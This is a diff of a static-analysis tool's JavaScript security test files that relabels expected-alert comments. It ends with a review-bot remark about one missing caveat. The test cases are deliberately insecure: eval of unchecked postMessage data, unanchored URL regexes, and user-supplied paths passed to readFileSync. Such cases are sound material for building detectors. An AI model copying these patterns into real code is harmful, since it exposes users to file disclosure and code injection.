sameConcatenation(allowedOrigin) { const trustedAuthority = "example.com"; - return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." + allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; // OK + return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." 
+ allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js index 6e5c0ce6a14a..8d6af30f773b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js @@ -8,7 +8,7 @@ window.onmessage = event => { // OK - good origin check eval(event.data); } -window.onmessage = event => { // NOT OK - no origin check +window.onmessage = event => { // $ Alert - no origin check let origin = event.origin.toLowerCase(); console.log(origin); @@ -21,7 +21,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; @@ -37,7 +37,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js index 7a5618f88ec7..5267128a0f3c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js 
@@ -1,76 +1,76 @@ (function coreRegExp() { /^a|/; - /^a|b/; // NOT OK + /^a|b/; // $ Alert /a|^b/; /^a|^b/; - /^a|b|c/; // NOT OK + /^a|b|c/; // $ Alert /a|^b|c/; /a|b|^c/; /^a|^b|c/; /(^a)|b/; - /^a|(b)/; // NOT OK + /^a|(b)/; // $ Alert /^a|(^b)/; - /^(a)|(b)/; // NOT OK + /^(a)|(b)/; // $ Alert - /a|b$/; // NOT OK + /a|b$/; // $ Alert /a$|b/; /a$|b$/; - /a|b|c$/; // NOT OK + /a|b|c$/; // $ Alert /a|b$|c/; /a$|b|c/; /a|b$|c$/; /a|(b$)/; - /(a)|b$/; // NOT OK + /(a)|b$/; // $ Alert /(a$)|b$/; - /(a)|(b)$/; // NOT OK + /(a)|(b)$/; // $ Alert - /^good.com|better.com/; // NOT OK - /^good\.com|better\.com/; // NOT OK - /^good\\.com|better\\.com/; // NOT OK - /^good\\\.com|better\\\.com/; // NOT OK - /^good\\\\.com|better\\\\.com/; // NOT OK + /^good.com|better.com/; // $ Alert + /^good\.com|better\.com/; // $ Alert + /^good\\.com|better\\.com/; // $ Alert + /^good\\\.com|better\\\.com/; // $ Alert + /^good\\\\.com|better\\\\.com/; // $ Alert - /^foo|bar|baz$/; // NOT OK - /^foo|%/; // OK + /^foo|bar|baz$/; // $ Alert + /^foo|%/; }); (function coreString() { new RegExp("^a|"); - new RegExp("^a|b"); // NOT OK + new RegExp("^a|b"); // $ Alert new RegExp("a|^b"); new RegExp("^a|^b"); - new RegExp("^a|b|c"); // NOT OK + new RegExp("^a|b|c"); // $ Alert new RegExp("a|^b|c"); new RegExp("a|b|^c"); new RegExp("^a|^b|c"); new RegExp("(^a)|b"); - new RegExp("^a|(b)"); // NOT OK + new RegExp("^a|(b)"); // $ Alert new RegExp("^a|(^b)"); - new RegExp("^(a)|(b)"); // NOT OK + new RegExp("^(a)|(b)"); // $ Alert - new RegExp("a|b$"); // NOT OK + new RegExp("a|b$"); // $ Alert new RegExp("a$|b"); new RegExp("a$|b$"); - new RegExp("a|b|c$"); // NOT OK + new RegExp("a|b|c$"); // $ Alert new RegExp("a|b$|c"); new RegExp("a$|b|c"); new RegExp("a|b$|c$"); new RegExp("a|(b$)"); - new RegExp("(a)|b$"); // NOT OK + new RegExp("(a)|b$"); // $ Alert new RegExp("(a$)|b$"); - new RegExp("(a)|(b)$"); // NOT OK + new RegExp("(a)|(b)$"); // $ Alert - new RegExp('^good.com|better.com'); // NOT OK - 
new RegExp('^good\.com|better\.com'); // NOT OK - new RegExp('^good\\.com|better\\.com'); // NOT OK - new RegExp('^good\\\.com|better\\\.com'); // NOT OK - new RegExp('^good\\\\.com|better\\\\.com'); // NOT OK + new RegExp('^good.com|better.com'); // $ Alert + new RegExp('^good\.com|better\.com'); // $ Alert + new RegExp('^good\\.com|better\\.com'); // $ Alert + new RegExp('^good\\\.com|better\\\.com'); // $ Alert + new RegExp('^good\\\\.com|better\\\\.com'); // $ Alert }); (function realWorld() { diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js index c0c5ecb3e3e0..895707fae0fc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js 
@@ -1,29 +1,29 @@ (function(x){ - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor - /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // NOT OK - new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // NOT OK + /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // $ Alert + new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // $ Alert - if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // NOT OK + if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // $ Alert - new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // NOT OK + new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // 
$ Alert - if ("something".match("other")) {} // OK - if ("something".match("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // NOT OK + if ("something".match("other")) {} + if ("something".match("x.commissary")) {} + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // $ Alert let trustedUrls = [ - "https?://good.com", // NOT OK, referenced below - /https?:\/\/good.com/, // NOT OK, referenced below - new RegExp("https?://good.com"), // NOT OK, referenced below - "^https?://good.com" // NOT OK - missing post-anchor + "https?://good.com", // $ Alert - referenced below + /https?:\/\/good.com/, // $ Alert - referenced below + new RegExp("https?://good.com"), // $ Alert - referenced below + "^https?://good.com" // $ Alert - missing post-anchor ]; function isTrustedUrl(url) { for (let trustedUrl of trustedUrls) { @@ -32,10 +32,10 @@ return false; } - /https?:\/\/good.com\/([0-9]+)/.exec(url); // NOT OK - "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // OK + /https?:\/\/good.com\/([0-9]+)/.exec(url); // $ Alert + "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // g or .replace? file = file.replace( 
@@ -46,7 +46,7 @@ // missing context of use const urlPatterns = [ { - regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, // OK + regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, type: 'iframe', w: 560, h: 314, url: '//www.youtube.com/embed/$1', allowFullscreen: true 
@@ -103,29 +103,29 @@ // replace path.replace(/engine.io/, "$&-client"); - /\.com|\.org/; // OK, has no domain name - /example\.com|whatever/; // OK, the other disjunction doesn't match a hostname + /\.com|\.org/; // OK - has no domain name + /example\.com|whatever/; // OK - the other disjunction doesn't match a hostname // MatchAll test cases: // Vulnerable patterns - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("good.com")) {} // NOT OK - missing protocol - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // NOT OK + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor + if 
("http://evil.com/?http://good.com".matchAll("good.com")) {} // $ Alert - missing protocol + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // $ Alert // Non-vulnerable patterns - if ("something".matchAll("other")) {} // OK - if ("something".matchAll("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} // OK + if ("something".matchAll("other")) {} + if ("something".matchAll("x.commissary")) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} + if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} }); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js index 913922271bb3..ef4bd7e9ca7f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js 
@@ -1,34 +1,34 @@ -var overlap1 = /^[0-93-5]$/; // NOT OK +var overlap1 = /^[0-93-5]$/; // $ Alert -var overlap2 = /[A-ZA-z]/; // NOT OK +var overlap2 = /[A-ZA-z]/; // $ Alert -var isEmpty = /^[z-a]$/; // NOT OK +var isEmpty = /^[z-a]$/; // $ Alert -var isAscii = /^[\x00-\x7F]*$/; // OK +var isAscii = /^[\x00-\x7F]*$/; var printable = /[!-~]/; // OK - used to select most printable ASCII characters -var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; // OK +var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; -const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; // OK +const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; -var smallOverlap = /[0-9a-fA-f]/; // NOT OK +var smallOverlap = /[0-9a-fA-f]/; // $ Alert -var weirdRange = /[$-`]/; // NOT OK +var weirdRange = /[$-`]/; // $ Alert -var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // NOT OK +var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // $ Alert -var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // NOT OK +var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // $ Alert -var numberToLetter = /[7-F]/; // NOT OK +var numberToLetter = /[7-F]/; // $ Alert -var overlapsWithClass1 = /[0-9\d]/; // NOT OK +var overlapsWithClass1 = /[0-9\d]/; // $ Alert -var overlapsWithClass2 = /[\w,.-?:*+]/; // NOT OK +var overlapsWithClass2 = /[\w,.-?:*+]/; // $ Alert -var tst2 = /^([ァ-ヾ]|[ァ-ン゙゚])+$/; // OK -var tst3 = /[0-90-9]/; // OK +var tst2 = /^([ァ-ヾ]|[ァ-ン゙゚])+$/; +var tst3 = /[0-90-9]/; -var question = /[0-?]/; // OK. matches one of: 0123456789:;<=>? +var question = /[0-?]/; // OK - matches one of: 0123456789:;<=>? -var atToZ = /[@-Z]/; // OK. matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file +var atToZ = /[@-Z]/; // OK - matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js index f7c6d172ead2..2c915a920b16 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js @@ -6,6 +6,5 @@ import { join } from 'path'; var server = createServer(function(req, res) { let path = parse(req.url, true).query.path; - // BAD: This could read any file on the file system - res.write(readFileSync(join("public", path))); + res.write(readFileSync(join("public", path))); // $ Alert - This could read any file on the file system }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js index fd768fecfff8..b598cbee74bf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js 
@@ -8,63 +8,52 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system - // BAD: This could still read any file on the file system - res.write(fs.readFileSync("/home/user/" + path)); + res.write(fs.readFileSync("/home/user/" + path)); // $ Alert - This could still read any file on the file system if (path.startsWith("/home/user/")) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path.indexOf("secret") == -1) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (fs.existsSync(path)) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt' || someOpaqueCondition()) - res.write(fs.readFileSync(path)); // BAD: Path is incompletely compared to white-list + res.write(fs.readFileSync(path)); // $ Alert - Path is incompletely compared to white-list path = sanitize(path); - res.write(fs.readFileSync(path)); // GOOD: Path is sanitized + res.write(fs.readFileSync(path)); // OK - Path is sanitized path = url.parse(req.url, true).query.path; - // GOOD: basename is safe + // OK - basename is safe 
res.write(fs.readFileSync(pathModule.basename(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.dirname(path))); - // GOOD: extname is safe + res.write(fs.readFileSync(pathModule.dirname(path))); // $ Alert - taint is preserved + // OK - extname is safe res.write(fs.readFileSync(pathModule.extname(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.normalize(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(x, path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(path, x))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); + res.write(fs.readFileSync(pathModule.join(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.join(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.normalize(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(x, path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(path, x))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); // $ Alert - taint is preserved }); var server = http.createServer(function(req, res) { // tests for a few uri-libraries - res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // NOT OK - 
res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // NOT OK - res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // NOT OK + res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // $ Alert }); (function(){ @@ -100,7 +89,7 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { 
@@ -113,36 +102,36 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - require('send')(req, path); // NOT OK + require('send')(req, path); // $ Alert }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var split = path.split("/"); - fs.readFileSync(split.join("/")); // NOT OK + fs.readFileSync(split.join("/")); // $ Alert - fs.readFileSync(prefix + split[split.length - 1]) // OK + fs.readFileSync(prefix + split[split.length - 1]) - fs.readFileSync(split[x]) // NOT OK - fs.readFileSync(prefix + split[x]) // NOT OK + fs.readFileSync(split[x]) // $ Alert + fs.readFileSync(prefix + split[x]) // $ Alert var concatted = prefix.concat(split); - fs.readFileSync(concatted.join("/")); // NOT OK + fs.readFileSync(concatted.join("/")); // $ Alert var concatted2 = split.concat(prefix); - fs.readFileSync(concatted2.join("/")); // NOT OK + fs.readFileSync(concatted2.join("/")); // $ Alert - fs.readFileSync(split.pop()); // NOT OK + fs.readFileSync(split.pop()); // $ Alert }); 
@@ -150,33 +139,33 @@ var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); // OK. - res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // NOT OK - res.write(fs.readFileSync(path.replace(/[./]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\//g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); // OK - - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\./g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); + res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // $ Alert + res.write(fs.readFileSync(path.replace(/[./]/g, ''))); + res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); + res.write(fs.readFileSync(path.replace(/\//g, ''))); + res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); + + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\./g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\./g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // OK + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); + 
res.write(fs.readFileSync(path.replace(/[..]/g, ''))); + res.write(fs.readFileSync(path.replace(/\./g, ''))); + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); } // removing of "../" from prefix. - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); // OK + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); - res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // NOT OK - not normalized - res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - not normalized + res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - can be absolute }); import normalizeUrl from 'normalize-url'; 
@@ -184,38 +173,38 @@ import normalizeUrl from 'normalize-url'; var server = http.createServer(function(req, res) { // tests for a few more uri-libraries const qs = require("qs"); - res.write(fs.readFileSync(qs.parse(req.url).foo)); // NOT OK - res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // NOT OK + res.write(fs.readFileSync(qs.parse(req.url).foo)); // $ Alert + res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // $ Alert const parseqs = require("parseqs"); - res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // NOT OK + res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // $ Alert }); const cp = require("child_process"); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - cp.execSync("foobar", {cwd: path}); // NOT OK - cp.execFileSync("foobar", ["args"], {cwd: path}); // NOT OK - cp.execFileSync("foobar", {cwd: path}); // NOT OK + cp.execSync("foobar", {cwd: path}); // $ Alert + cp.execFileSync("foobar", ["args"], {cwd: path}); // $ Alert + cp.execFileSync("foobar", {cwd: path}); // $ Alert }); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // NOT OK. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK -- Might be okay depending on what unknownFlags evaluates to. + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK - Might be okay depending on what unknownFlags evaluates to. 
}); var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // NOT OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); // OK + res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js index 1fdbef68c47e..a3e4028b0daa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js @@ -7,6 +7,5 @@ const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { let filePath = url.parse(req.url, true).query.path; - // BAD: This function uses unsanitized input that can read any file on the file system. - res.write(fs.readFileSync(ROOT + filePath, 'utf8')); + res.write(fs.readFileSync(ROOT + filePath, 'utf8')); // $ Alert - This function uses unsanitized input that can read any file on the file system. }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js index ac8dd4fb9ba8..5b497cfddccb 100644 
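Review bot: The last case in the `isAbsolute` block, `path.replace(new RegExp("[.]", unknownFlags()), '')`, lost its `// OK` marker without gaining a caveat. The parallel character-class case earlier in the same hunk keeps one (`// OK - Might be okay depending on what unknownFlags evaluates to.`). Without the `g` flag the replace strips only the first match, which is why the `''`-flags variant two lines above is marked `// $ Alert`. The unknown-flags line should carry the same hedge: `// OK - Might be okay depending on what unknownFlags evaluates to.`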
